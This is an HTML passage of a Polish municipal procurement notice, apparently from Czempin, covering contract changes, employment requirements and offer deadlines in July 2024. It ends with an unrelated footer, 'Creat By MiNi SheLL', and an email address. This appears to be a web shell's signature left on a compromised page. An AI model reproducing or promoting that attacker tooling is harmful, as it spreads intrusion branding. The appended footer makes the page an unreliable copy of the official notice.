Wykonawcy),<br/>2)zmianę pojazdów, o których mowa w §3 ust. 1 na zasadach określonych w tym paragrafie (zmiana nie wymaga podpisania aneksu i będzie dokonywana poprzez pisemne - dopuszcza się skan dokumentu przesłany e-mailowo - poinformowanie Wykonawcy)(...) Dalsza część dotycząca zmian umowy zawarta jest w § 10 załącznika nr 9b do SWZ - Projekt umowy dla cz.III. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-24 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy: https://platformazakupowa.pl/pn/czempin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-24 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com